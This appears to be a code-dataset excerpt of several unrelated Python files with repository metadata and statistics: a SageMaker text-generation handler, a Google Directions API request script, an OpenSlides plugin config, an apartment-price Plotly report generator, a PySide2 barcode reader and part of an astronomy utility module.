permission_classes = (IsAuthenticated, UserIsOwnerOrAdminPermission)
serializer_class = OrderSerializer
queryset = Order.objects.all()
owner_field = "user"
| 34.793893
| 111
| 0.691751
| 975
| 9,116
| 6.252308
| 0.264615
| 0.037894
| 0.024606
| 0.011483
| 0.274934
| 0.225558
| 0.170932
| 0.148294
| 0.089239
| 0.089239
| 0
| 0.004894
| 0.237933
| 9,116
| 261
| 112
| 34.927203
| 0.872607
| 0.160926
| 0
| 0.22807
| 0
| 0
| 0.052176
| 0.010949
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040936
| false
| 0
| 0.175439
| 0
| 0.450292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a10f7c8bb2269ffd29a74f44cb282618db5d67
| 3,334
|
py
|
Python
|
sagemaker-python-sdk/pytorch_lstm_word_language_model/source/generate.py
|
BluePilgrim/amazon-sagemaker-examples
|
e20c855dd912331a9380980712f2fef7d05d3d2d
|
[
"Apache-2.0"
] | 7
|
2018-10-25T16:35:54.000Z
|
2022-02-12T15:24:11.000Z
|
sagemaker-python-sdk/pytorch_lstm_word_language_model/source/generate.py
|
vlordier/amazon-sagemaker-examples
|
6c59b6e435f040bdbe6a7c346fc0ce397f7746d8
|
[
"Apache-2.0"
] | 1
|
2019-04-10T20:21:18.000Z
|
2019-04-10T20:21:18.000Z
|
sagemaker-python-sdk/pytorch_lstm_word_language_model/source/generate.py
|
vlordier/amazon-sagemaker-examples
|
6c59b6e435f040bdbe6a7c346fc0ce397f7746d8
|
[
"Apache-2.0"
] | 2
|
2020-02-19T03:10:18.000Z
|
2022-03-16T12:49:31.000Z
|
import json
import logging
import os
import torch
from rnn import RNNModel
import data
JSON_CONTENT_TYPE = 'application/json'
logger = logging.getLogger(__name__)
def model_fn(model_dir):
logger.info('Loading the model.')
model_info = {}
with open(os.path.join(model_dir, 'model_info.pth'), 'rb') as f:
model_info = torch.load(f)
print('model_info: {}'.format(model_info))
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
logger.info('Current device: {}'.format(device))
model = RNNModel(rnn_type=model_info['rnn_type'], ntoken=model_info['ntoken'],
ninp=model_info['ninp'], nhid=model_info['nhid'], nlayers=model_info['nlayers'],
dropout=model_info['dropout'], tie_weights=model_info['tie_weights'])
with open(os.path.join(model_dir, 'model.pth'), 'rb') as f:
model.load_state_dict(torch.load(f))
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
model.rnn.flatten_parameters()
model.to(device).eval()
logger.info('Loading the data.')
corpus = data.Corpus(model_dir)
logger.info('Done loading model and corpus. Corpus dictionary size: {}'.format(len(corpus.dictionary)))
return {'model': model, 'corpus': corpus}
def input_fn(serialized_input_data, content_type=JSON_CONTENT_TYPE):
logger.info('Deserializing the input data.')
if content_type == JSON_CONTENT_TYPE:
input_data = json.loads(serialized_input_data)
if input_data['temperature'] < 1e-3:
raise Exception('\'temperature\' has to be greater or equal 1e-3')
return input_data
raise Exception('Requested unsupported ContentType in content_type: ' + content_type)
def output_fn(prediction_output, accept=JSON_CONTENT_TYPE):
logger.info('Serializing the generated output.')
if accept == JSON_CONTENT_TYPE:
return json.dumps(prediction_output), accept
raise Exception('Requested unsupported ContentType in Accept: ' + accept)
def predict_fn(input_data, model):
logger.info('Generating text based on input parameters.')
corpus = model['corpus']
model = model['model']
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
logger.info('Current device: {}'.format(device))
torch.manual_seed(input_data['seed'])
ntokens = len(corpus.dictionary)
input = torch.randint(ntokens, (1, 1), dtype=torch.long).to(device)
hidden = model.init_hidden(1)
logger.info('Generating {} words.'.format(input_data['words']))
result = []
with torch.no_grad(): # no tracking history
for i in range(input_data['words']):
output, hidden = model(input, hidden)
word_weights = output.squeeze().div(input_data['temperature']).exp().cpu()
word_idx = torch.multinomial(word_weights, 1)[0]
input.fill_(word_idx)
word = corpus.dictionary.idx2word[word_idx]
word = word if type(word) == str else word.decode()
if word == '<eos>':
word = '\n'
elif i % 12 == 11:
word = word + '\n'
else:
word = word + ' '
result.append(word)
return ''.join(result)
| 39.223529
| 107
| 0.654469
| 433
| 3,334
| 4.877598
| 0.327945
| 0.051136
| 0.035511
| 0.017045
| 0.20786
| 0.154356
| 0.109848
| 0.109848
| 0.080492
| 0.080492
| 0
| 0.005368
| 0.217756
| 3,334
| 84
| 108
| 39.690476
| 0.804448
| 0.044691
| 0
| 0.058824
| 0
| 0
| 0.178246
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.058824
| false
| 0
| 0.088235
| 0
| 0.205882
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a2597adcdcae122cb7a9e4d78b3707b95ae319
| 889
|
py
|
Python
|
get_data.py
|
fromdatavistodatascience/Boston-Airpot-Traffic-Visualisation
|
9f30e89e68c25e6fbcf13d84fee561b53ff70d84
|
[
"MIT"
] | null | null | null |
get_data.py
|
fromdatavistodatascience/Boston-Airpot-Traffic-Visualisation
|
9f30e89e68c25e6fbcf13d84fee561b53ff70d84
|
[
"MIT"
] | null | null | null |
get_data.py
|
fromdatavistodatascience/Boston-Airpot-Traffic-Visualisation
|
9f30e89e68c25e6fbcf13d84fee561b53ff70d84
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import json
import requests
#Retrieving my api keys information to access the Google API.
def get_keys(path):
with open(path) as f:
return json.load(f)
keys = get_keys("/Users/jjherranzsarrion/.secret/google_blog2_api.json")
api_key = keys['api_key']
url = 'https://maps.googleapis.com/maps/api/directions/json?'
origin = 'Sheepfold+Dog+Park+Fells+Path+Stoneham+MA'
destination = 'Terminal+C+Boston+Logan+International+Airport+Boston+MA+02128'
departure_time = '1566819000' #time in seconds from midnight 1st Jan 1970 (Unix start time) until Monday 19th August at 07:30 AM.
url_params = f"origin={origin}&destination={destination}&departure_time={departure_time}&key={api_key}"
request_url = url + url_params
response = requests.get(request_url)
with open('response.json', 'w') as f:
json.dump(response.json(), f)
| 31.75
| 130
| 0.743532
| 135
| 889
| 4.792593
| 0.562963
| 0.027821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035111
| 0.134983
| 889
| 27
| 131
| 32.925926
| 0.806242
| 0.177728
| 0
| 0
| 0
| 0
| 0.447802
| 0.332418
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.222222
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a4801e3fd9b2dd8d7fd997f38c4f96f2672de6
| 1,807
|
py
|
Python
|
openslides_protocol/apps.py
|
OpenSlides/openslides-protocol
|
71366a4f251165384dd359a31fdc0fab79a652a1
|
[
"MIT"
] | null | null | null |
openslides_protocol/apps.py
|
OpenSlides/openslides-protocol
|
71366a4f251165384dd359a31fdc0fab79a652a1
|
[
"MIT"
] | 11
|
2017-08-02T10:48:24.000Z
|
2018-10-19T13:53:51.000Z
|
openslides_protocol/apps.py
|
OpenSlides/openslides-protocol
|
71366a4f251165384dd359a31fdc0fab79a652a1
|
[
"MIT"
] | 2
|
2017-05-10T14:11:34.000Z
|
2018-01-10T11:44:10.000Z
|
from django.apps import AppConfig
from openslides.utils.collection import Collection
from . import (
__description__,
__license__,
__url__,
__verbose_name__,
__version__,
)
class ProtocolAppConfig(AppConfig):
name = 'openslides_protocol'
verbose_name = __verbose_name__
description = __description__
version = __version__
license = __license__
url = __url__
angular_site_module = True
js_files = [
'static/js/openslides_protocol/base.js',
'static/js/openslides_protocol/site.js',
'static/js/openslides_protocol/templatehooks.js',
'static/js/openslides_protocol/templates.js'
]
def ready(self):
# Import all required stuff.
from openslides.core.config import config
from openslides.core.signals import post_permission_creation
from openslides.utils.rest_api import router
from .config_variables import get_config_variables
from .signals import add_permissions_to_builtin_groups
from .views import ObjectProtocolViewSet, ProtocolViewSet
# Define config variables
config.update_config_variables(get_config_variables())
# Connect signals.
post_permission_creation.connect(
add_permissions_to_builtin_groups,
dispatch_uid='protocol_add_permissions_to_builtin_groups'
)
# Register viewsets.
router.register(self.get_model('ObjectProtocol').get_collection_string(), ObjectProtocolViewSet)
router.register(self.get_model('Protocol').get_collection_string(), ProtocolViewSet)
def get_startup_elements(self):
yield Collection(self.get_model('ObjectProtocol').get_collection_string())
yield Collection(self.get_model('Protocol').get_collection_string())
| 34.09434
| 104
| 0.722191
| 189
| 1,807
| 6.42328
| 0.343915
| 0.074135
| 0.059308
| 0.085667
| 0.327018
| 0.138386
| 0.138386
| 0
| 0
| 0
| 0
| 0
| 0.204759
| 1,807
| 52
| 105
| 34.75
| 0.844816
| 0.047593
| 0
| 0
| 0
| 0
| 0.155594
| 0.118881
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05
| false
| 0
| 0.225
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75a691a31ac0f85d25914cc8c58acb2e67e97fd0
| 9,700
|
py
|
Python
|
scripts/gen_report.py
|
twjang/korea_apartment_price
|
cd1414dfe6fe46e7d47625d2f65abe07f7c2db75
|
[
"MIT"
] | 1
|
2021-12-14T13:03:38.000Z
|
2021-12-14T13:03:38.000Z
|
scripts/gen_report.py
|
twjang/korea_apartment_price
|
cd1414dfe6fe46e7d47625d2f65abe07f7c2db75
|
[
"MIT"
] | null | null | null |
scripts/gen_report.py
|
twjang/korea_apartment_price
|
cd1414dfe6fe46e7d47625d2f65abe07f7c2db75
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import json
from typing import List, Optional, Tuple
import datetime
import re
import io
import base64
import os
import sys
import argparse
from plotly.missing_ipywidgets import FigureWidget
from tqdm import tqdm
import minify_html
ROOT=os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.append(ROOT)
import plotly
import plotly.io
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import korea_apartment_price
from korea_apartment_price.db import ApartmentId, EntryNotFound
from korea_apartment_price.utils import editdist
def date_serial2date(x:int):
year = x // 10000
month = (x // 100) % 100
date = (x) % 100
return datetime.datetime(year, month, date)
def render_graph(apts: List[ApartmentId], date_from=20190101)->Tuple[str, FigureWidget]:
sizes = set(korea_apartment_price.db.query_trades(apt_ids=apts, filters=[korea_apartment_price.db.pick_size], date_from=date_from, include_canceled=True))
if len(sizes) == 0:
sizes = set([apt['size'] for apt in apts])
favorite_size = apts[0]['size']
chosen_size = list(sorted([(abs(s-favorite_size), s) for s in sizes]))[0][1]
fig = go.Figure()
aptname = re.sub(r'[0-9]+[ ]*단지[ ]*$', '', apts[0]["name"])
title=(f'{apts[0]["address"]}', f'{aptname} (전용 {chosen_size}평)')
fig.update_layout(height = 500, margin=dict(l=10, r=10, b=10, t=10))
fig.update_yaxes(
showline=True,
linecolor='black',
linewidth=1,
mirror=True
)
fig.update_xaxes(
tickformat='%Y-%m-%d',
hoverformat='%Y-%m-%d',
showline=True,
linecolor='black',
linewidth=1,
mirror=True
)
trades = korea_apartment_price.db.query_trades(apt_ids=apts, size_from=chosen_size-0.9, size_to=chosen_size+0.9, date_from=date_from, include_canceled=True)
trades_x = [date_serial2date(t['date_serial']) for t in trades if not t['is_canceled']]
trades_y = [t['price'] / 10000 for t in trades if not t['is_canceled']]
labels = [f'{t["floor"]}층' for t in trades if not t['is_canceled']]
canceled_trades_x = [date_serial2date(t['date_serial']) for t in trades if t['is_canceled']]
canceled_trades_y = [t['price'] / 10000 for t in trades if t['is_canceled']]
canceled_labels = [f'{t["floor"]}층(취소)' for t in trades if t['is_canceled']]
el = go.Scattergl(x=trades_x, y=trades_y, showlegend = False, marker={'color': 'blue', 'size': 10}, mode='markers', hovertext=labels, name='실거래')
el_canceled = go.Scattergl(x=canceled_trades_x, y=canceled_trades_y, showlegend = False, marker={'color': 'orange', 'size': 10, 'symbol': 'x'}, mode='markers', hovertext=canceled_labels, name='취소')
fig.add_trace(el)
fig.add_trace(el_canceled)
for apt in apts:
try:
kb_orderbook = sorted(korea_apartment_price.db.query_kb_orderbook(apt, size_from=chosen_size-1, size_to=chosen_size+1, fetched_from=date_from), key=lambda x: x['fetched_at'])
break
except EntryNotFound:
print(apt)
pass
fetched_date_cnt = {}
fetched_price_date_cnt = {}
fetched_price_date_lbls = {}
for od in kb_orderbook:
date_end = od['fetched_at']
if od['detail']['최소매매가'] is not None:
price = int(od['detail']['최소매매가']) / 10000
else:
price = od['price'] / 10000
fetched_date_cnt[date_end] = fetched_date_cnt.get(date_end, 0) + 1
fetched_price_date_cnt[(date_end, price)] = fetched_price_date_cnt.get((date_end, price), 0) + 1
if not (date_end, price) in fetched_price_date_lbls:
fetched_price_date_lbls[(date_end, price)] = set()
curlbl = ''
if od['apt_dong'] is not None and len(od['apt_dong']) > 0:
curlbl += f'{od["apt_dong"]}동'
if od['apt_ho'] is not None and len(od['apt_ho']) > 0:
curlbl += f'{od["apt_ho"]}호'
elif od['floor'] is not None and len(od['floor']) > 0:
curlbl += f'{od["floor"]}'
if curlbl == '': curlbl='정보없음'
curlbl = curlbl.replace('제', '').replace('T', '')
fetched_price_date_lbls[(date_end, price)].add(curlbl)
fetched_dates = sorted(fetched_date_cnt.keys())
max_cnt = max([1] + list(fetched_price_date_cnt.values()))
for (date_end, price), cnt in sorted(fetched_price_date_cnt.items()):
date_start = None
for trial_date_start in fetched_dates:
if trial_date_start < date_end: date_start = trial_date_start
if date_start is None:
date_start = date_end - datetime.timedelta(2)
opacity = min(1.0, 0.1 + 0.9 * cnt / max_cnt)
fig.add_trace(go.Scattergl(x=[date_start, date_end], y=[price, price], line={'width':2, 'color':'red'}, marker=None, opacity=opacity, showlegend = False, name='', hoverinfo='skip', mode='lines'))
details = sorted(list(fetched_price_date_lbls[(date_end, price)]))
details = '<br>' + '<br>'.join(sorted(details))
marker = go.Scattergl(x=[date_end], y=[price], text=[f'{cnt}개 {details}'], line=None, marker={'color':'red', 'size': 3}, opacity=opacity, showlegend = False, name='', mode='markers')
fig.add_trace(marker)
return title, fig
parser = argparse.ArgumentParser()
parser.add_argument('aptlst', help='a csv file that contains gu and the apartment name')
parser.add_argument('output', help='output html report path')
args = parser.parse_args()
apts = []
print('[+] reading apartment list')
with open(args.aptlst, 'r') as f:
for line in tqdm(f.readlines()):
line = line.strip()
line = line.split(',', 2)
if len(line) not in [2, 3]:
print (f'Warning: ignoring line "{line}"')
continue
if len(line) == 2:
addr, name = [s.strip() for s in line]
size = 18
else:
addr, name, size = [s.strip() for s in line]
size = int(size)
selected=korea_apartment_price.shortcuts.search(addr, name)
best_editdist = None
best_apt = None
for apt in selected:
apt['size'] = size
cur_editdist = editdist(name, apt['name'])
if best_apt is None or best_editdist > cur_editdist:
best_apt = apt
best_editdist = cur_editdist
if best_apt is not None:
apts.append(best_apt)
else:
print(f'[!] couldn\'t find apt entries for query=({addr}, {name})')
uniq_apts = {}
for apt in apts:
uniq_apts[(apt['address'], apt['name'], apt['size'])] = apt
apts = [uniq_apts[k] for k in sorted(uniq_apts.keys())]
######## XXX
#apts = apts[-3:]
uniq_apts = {}
for apt in apts:
aptname = re.sub(r'[0-9]+[ ]*단지[ ]*$', '', apt["name"])
key = apt['address'], aptname, apt['size']
if not key in uniq_apts: uniq_apts[key] = []
uniq_apts[key].append(apt)
apt_keys = sorted(uniq_apts.keys())
print('[+] generating report')
for apt_addr, apt_name, apt_size in apt_keys:
print(f'{apt_addr} {apt_name} [전용 {apt_size}평]')
data = []
data_by_addr = {}
addrlst = []
for aptidx, apt_key in enumerate(tqdm(apt_keys)):
apts = uniq_apts[apt_key]
(addr, aptname), fig = render_graph(apts)
cur_chart = json.loads(plotly.io.to_json(fig))
if 'data' in cur_chart:
for e in cur_chart['data']:
e['type'] = 'scattergl'
data.append({
'addr': addr,
'aptname': aptname,
'fig': cur_chart,
})
if not addr in data_by_addr: data_by_addr[addr] = []
data_by_addr[addr].append(aptidx)
addrlst = sorted(list(data_by_addr.keys()))
datestr = datetime.datetime.now().strftime('%Y-%m-%d')
html = f"""<!DOCTYPE html>
<html lang="kr">
<head>
<meta charset="utf-8" />
<meta http-equiv="x-ua-compatible" content="ie=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>{datestr} 아파트 보고서</title>
<script src="https://code.jquery.com/jquery-3.6.0.js"></script>
<script src="https://code.jquery.com/ui/1.13.0/jquery-ui.js"></script>
<script type="text/javascript" src="https://cdn.plot.ly/plotly-latest.min.js"></script>
<script type="text/javascript" id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-mml-chtml.js"></script>
<link href="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/css/select2.min.css" rel="stylesheet" />
<script src="https://cdn.jsdelivr.net/npm/select2@4.1.0-rc.0/dist/js/select2.min.js"></script>
<script src="https://cdn.tailwindcss.com"></script>
<link rel="stylesheet" href="//code.jquery.com/ui/1.13.0/themes/base/jquery-ui.css">
</head>
"""
html += f"""<script>let chartData={json.dumps(data, ensure_ascii=False, separators=(',', ':'))};</script>"""
html += """<script>
function updateChart(idx) {
let chartdiv = document.getElementById('chart');
console.log(idx);
Plotly.react(chart, chartData[idx]['fig']['data'], chartData[idx]['fig']['layout'], {displayModeBar: false});
}
$(document).ready(()=>{
$('#aptselect').select2();
$('#aptselect').on('select2:select', function (e) {
let data = e.params.data;
updateChart(parseInt(data.id));
});
let chartdiv = document.getElementById('chart');
Plotly.newPlot(chart, chartData[0]['fig']['data'], chartData[0]['fig']['layout'], {displayModeBar: false});
});
</script>
"""
options = ""
for cur_addr in addrlst:
options += f'<optgroup label="{cur_addr}">'
for cur_data_idx in data_by_addr[cur_addr]:
cur_data = data[cur_data_idx]
options += f'<option value="{cur_data_idx}" {"selected" if cur_data_idx == 0 else ""}>{cur_data["aptname"]}</option>'
options += '</optgroup>'
html += f"""
<body>
<div class="h-screen m-0 p-0 flex flex-col">
<div class="grow-0">
<h3 class="text-center font-bold text-lg">{datestr} 아파트 보고서</h3>
<div class="m-3">
<select class="w-full p-3" id="aptselect" name="aptselect">
{options}
</select>
</div>
</div>
<div class="grow p-1"><div id="chart"></div></div>
</body>
</html>"""
with open(args.output, 'w') as f:
f.write(html)
print('[+] done')
| 34.767025
| 199
| 0.66299
| 1,484
| 9,700
| 4.177898
| 0.234501
| 0.015806
| 0.025806
| 0.011613
| 0.237581
| 0.182742
| 0.136935
| 0.085645
| 0.066774
| 0.040645
| 0
| 0.017621
| 0.157526
| 9,700
| 278
| 200
| 34.892086
| 0.741067
| 0.004124
| 0
| 0.104348
| 0
| 0.043478
| 0.305867
| 0.061153
| 0.004348
| 0
| 0
| 0
| 0
| 1
| 0.008696
| false
| 0.004348
| 0.082609
| 0
| 0.1
| 0.030435
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75ac67c019d243b02047c3a4e50c8d709addc5ed
| 5,241
|
py
|
Python
|
examples/qt/barcode-reader.py
|
claire-chan/python
|
9a22ab20a8d0171f491730199edfd7ce7e4d806c
|
[
"MIT"
] | 12
|
2020-01-08T13:43:19.000Z
|
2022-03-09T08:35:45.000Z
|
examples/qt/barcode-reader.py
|
claire-chan/python
|
9a22ab20a8d0171f491730199edfd7ce7e4d806c
|
[
"MIT"
] | 2
|
2020-09-10T07:06:50.000Z
|
2022-01-04T17:29:54.000Z
|
examples/qt/barcode-reader.py
|
claire-chan/python
|
9a22ab20a8d0171f491730199edfd7ce7e4d806c
|
[
"MIT"
] | 11
|
2020-03-16T18:22:13.000Z
|
2022-01-07T08:23:08.000Z
|
import sys
from PySide2.QtGui import QPixmap, QImage
from PySide2.QtWidgets import QApplication, QLabel, QPushButton, QVBoxLayout, QWidget, QFileDialog, QTextEdit, QSizePolicy, QMessageBox, QHBoxLayout
from PySide2.QtCore import Slot, Qt, QStringListModel, QSize, QTimer
from dbr import DynamsoftBarcodeReader
dbr = DynamsoftBarcodeReader()
import os
import cv2
class UI_Window(QWidget):
def __init__(self):
QWidget.__init__(self)
# The default barcode image.
dir_path = os.path.dirname(os.path.realpath(__file__))
filename = os.path.join(dir_path, 'image.tif')
# Create a timer.
self.timer = QTimer()
self.timer.timeout.connect(self.nextFrameSlot)
# Create a layout.
layout = QVBoxLayout()
# Add a button
self.btn = QPushButton("Load an image")
self.btn.clicked.connect(self.pickFile)
layout.addWidget(self.btn)
# Add a button
button_layout = QHBoxLayout()
btnCamera = QPushButton("Open camera")
btnCamera.clicked.connect(self.openCamera)
button_layout.addWidget(btnCamera)
btnCamera = QPushButton("Stop camera")
btnCamera.clicked.connect(self.stopCamera)
button_layout.addWidget(btnCamera)
layout.addLayout(button_layout)
# Add a label
self.label = QLabel()
self.label.setFixedSize(640, 640)
pixmap = self.resizeImage(filename)
self.label.setPixmap(pixmap)
layout.addWidget(self.label)
# Add a text area
self.results = QTextEdit()
self.readBarcode(filename)
layout.addWidget(self.results)
# Set the layout
self.setLayout(layout)
self.setWindowTitle("Dynamsoft Barcode Reader")
self.setFixedSize(800, 800)
# https://stackoverflow.com/questions/1414781/prompt-on-exit-in-pyqt-application
def closeEvent(self, event):
msg = "Close the app?"
reply = QMessageBox.question(self, 'Message',
msg, QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
self.stopCamera()
else:
event.ignore()
def readBarcode(self, filename):
dbr.initLicense("Your License")
results = dbr.decodeFile(filename, 0x3FF | 0x2000000 | 0x4000000 | 0x8000000 | 0x10000000)
out = ''
index = 0
for result in results:
out += "Index: " + str(index) + "\n"
out += "Barcode format: " + result[0] + '\n'
out += "Barcode value: " + result[1] + '\n'
out += '-----------------------------------\n'
index += 1
self.results.setText(out)
def resizeImage(self, filename):
pixmap = QPixmap(filename)
lwidth = self.label.maximumWidth()
pwidth = pixmap.width()
lheight = self.label.maximumHeight()
pheight = pixmap.height()
wratio = pwidth * 1.0 / lwidth
hratio = pheight * 1.0 / lheight
if pwidth > lwidth or pheight > lheight:
if wratio > hratio:
lheight = pheight / wratio
else:
lwidth = pwidth / hratio
scaled_pixmap = pixmap.scaled(lwidth, lheight)
return scaled_pixmap
else:
return pixmap
def pickFile(self):
self.stopCamera()
# Load an image file.
filename = QFileDialog.getOpenFileName(self, 'Open file',
'E:\\Program Files (x86)\\Dynamsoft\\Barcode Reader 7.2\\Images', "Barcode images (*)")
# Show barcode images
pixmap = self.resizeImage(filename[0])
self.label.setPixmap(pixmap)
# Read barcodes
self.readBarcode(filename[0])
def openCamera(self):
self.vc = cv2.VideoCapture(0)
# vc.set(5, 30) #set FPS
self.vc.set(3, 640) #set width
self.vc.set(4, 480) #set height
if not self.vc.isOpened():
msgBox = QMessageBox()
msgBox.setText("Failed to open camera.")
msgBox.exec_()
return
self.timer.start(1000./24)
def stopCamera(self):
self.timer.stop()
# https://stackoverflow.com/questions/41103148/capture-webcam-video-using-pyqt
def nextFrameSlot(self):
rval, frame = self.vc.read()
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
image = QImage(frame, frame.shape[1], frame.shape[0], QImage.Format_RGB888)
pixmap = QPixmap.fromImage(image)
self.label.setPixmap(pixmap)
results = dbr.decodeBuffer(frame, 0x3FF | 0x2000000 | 0x4000000 | 0x8000000 | 0x10000000)
out = ''
index = 0
for result in results:
out += "Index: " + str(index) + "\n"
out += "Barcode format: " + result[0] + '\n'
out += "Barcode value: " + result[1] + '\n'
out += '-----------------------------------\n'
index += 1
self.results.setText(out)
def main():
app = QApplication(sys.argv)
ex = UI_Window()
ex.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
| 31.011834
| 148
| 0.577752
| 549
| 5,241
| 5.453552
| 0.342441
| 0.024048
| 0.014696
| 0.024048
| 0.133601
| 0.111556
| 0.111556
| 0.111556
| 0.111556
| 0.111556
| 0
| 0.039771
| 0.299561
| 5,241
| 168
| 149
| 31.196429
| 0.77581
| 0.072505
| 0
| 0.237288
| 0
| 0
| 0.078877
| 0.020442
| 0
| 0
| 0.017345
| 0
| 0
| 1
| 0.076271
| false
| 0
| 0.059322
| 0
| 0.169492
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
75af09b693b1a39a86476d750fe6c76d93b99535
| 6,820
|
py
|
Python
|
mdetsims/dbsim/erins_code/util.py
|
kaiwen-kakuiii/metadetect-sims
|
a0fd133ca5bc946c6ce769e8657ef2ce10226953
|
[
"BSD-3-Clause"
] | 2
|
2021-07-12T09:41:51.000Z
|
2022-01-27T08:13:33.000Z
|
mdetsims/dbsim/erins_code/util.py
|
kaiwen-kakuiii/metadetect-sims
|
a0fd133ca5bc946c6ce769e8657ef2ce10226953
|
[
"BSD-3-Clause"
] | 6
|
2019-04-04T23:53:27.000Z
|
2021-07-30T11:35:20.000Z
|
mdetsims/dbsim/erins_code/util.py
|
kaiwen-kakuiii/metadetect-sims
|
a0fd133ca5bc946c6ce769e8657ef2ce10226953
|
[
"BSD-3-Clause"
] | 2
|
2020-10-30T18:14:29.000Z
|
2021-07-22T16:34:56.000Z
|
import sys
import logging
import numpy as np
logger = logging.getLogger(__name__)
class TryAgainError(Exception):
"""
signal to skip this image(s) and try a new one
"""
def __init__(self, message):
# Call the base class constructor with the parameters it needs
Exception.__init__(self, message)
def setup_logging(level):
if level=='info':
l=logging.INFO
elif level=='debug':
l=logging.DEBUG
elif level=='warning':
l=logging.WARNING
elif level=='error':
l=logging.ERROR
else:
l=logging.CRITICAL
logging.basicConfig(stream=sys.stdout, level=l)
def log_pars(pars, fmt='%8.3g',front=None):
"""
print the parameters with a uniform width
"""
s = []
if front is not None:
s.append(front)
if pars is not None:
fmt = ' '.join( [fmt+' ']*len(pars) )
s.append( fmt % tuple(pars) )
s = ' '.join(s)
logger.debug(s)
class Namer(object):
"""
create strings with a specified front prefix
"""
def __init__(self, front=None, back=None):
if front=='':
front=None
if back=='' or back=='noshear':
back=None
self.front=front
self.back=back
if self.front is None and self.back is None:
self.nomod=True
else:
self.nomod=False
def __call__(self, name):
n = name
if not self.nomod:
if self.front is not None:
n = '%s_%s' % (self.front, n)
if self.back is not None:
n = '%s_%s' % (n, self.back)
return n
def convert_run_to_seed(run):
"""
convert the input config file name to an integer for use
as a seed
"""
import hashlib
h = hashlib.sha256(run.encode('utf-8')).hexdigest()
seed = int(h, base=16) % 2**30
logger.info("got seed %d from run %s" % (seed,run))
return seed
def get_trials_nsplit(c):
"""
split into chunks
"""
from math import ceil
ntrials = c['ntrials']
tmsec = c['desired_hours']*3600.0
sec_per = c['sec_per']
ntrials_per = int(round( tmsec/sec_per ) )
nsplit = int(ceil( ntrials/float(ntrials_per) ))
time_hours = ntrials_per*sec_per/3600.0
logger.info("ntrials requested: %s" % (ntrials))
logger.info('seconds per image: %s sec per with rand: %s' % (c['sec_per'],sec_per))
logger.info('nsplit: %d ntrials per: %d time (hours): %s' % (nsplit,ntrials_per,time_hours))
return ntrials_per, nsplit, time_hours
def get_trials_per_job_mpi(njobs, ntrials):
"""
split for mpi
"""
return int(round(float(ntrials)/njobs))
#
# matching by row,col
#
def match_truth(data, truth, radius_arcsec=0.2, pixel_scale=0.263):
"""
get indices in the data that match truth catalog by x,y position
"""
radius_pixels = radius_arcsec/pixel_scale
print("matching")
allow=1
mdata, mtruth = close_match(
data['x'],
data['y'],
truth['x'],
truth['y'],
radius_pixels,
allow,
)
nmatch=mdata.size
ntot=data.size
frac=float(nmatch)/ntot
print(' matched %d/%d %.3f within '
'%.3f arcsec' % (nmatch, ntot, frac,radius_arcsec))
return mdata
def close_match(t1,s1,t2,s2,ep,allow,verbose=False):
"""
Find the nearest neighbors between two arrays of x/y
parameters
----------
x1, y1: scalar or array
coordinates of a set of points. Must be same length.
x2, y2: scalar or array
coordinates of a second set of points. Must be same length.
ep: scalar
maximum match distance between pairs (pixels)
allow: scalar
maximum number of matches in second array to each element in first array.
verbose: boolean
make loud
Original by Dave Johnston, University of Michigan, 1997
Translated from IDL by Eli Rykoff, SLAC
modified slightly by erin sheldon
"""
t1=np.atleast_1d(t1)
s1=np.atleast_1d(s1)
t2=np.atleast_1d(t2)
s2=np.atleast_1d(s2)
n1=t1.size
n2=t2.size
